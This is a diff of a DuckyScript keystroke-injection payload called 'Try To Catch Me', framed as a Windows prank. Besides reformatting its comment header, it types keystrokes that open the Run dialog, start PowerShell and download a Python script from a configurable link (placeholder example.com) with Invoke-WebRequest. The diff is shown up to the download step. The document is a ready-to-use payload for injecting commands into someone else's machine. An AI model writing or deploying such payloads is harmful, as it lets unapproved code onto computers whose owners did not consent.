@@ -1,27 +1,26 @@ -REM #################################### -REM # | -REM # Title : Try To Catch Me | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Windows 10/11 | -REM # | -REM #################################### +REM_BLOCK +#################################### +# # +# Title : Try To Catch Me # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10/11 # +# # +#################################### - -REM Requirements: -REM - Python -REM - Internet Connection +Requirements: + - Python + - Internet Connection +END_REM REM REQUIRED - Set your Python script link DEFINE #SCRIPT-PY-LINK example.com - DELAY 1000 GUI r DELAY 500 -STRING powershell -ENTER +STRINGLN powershell DELAY 500 STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"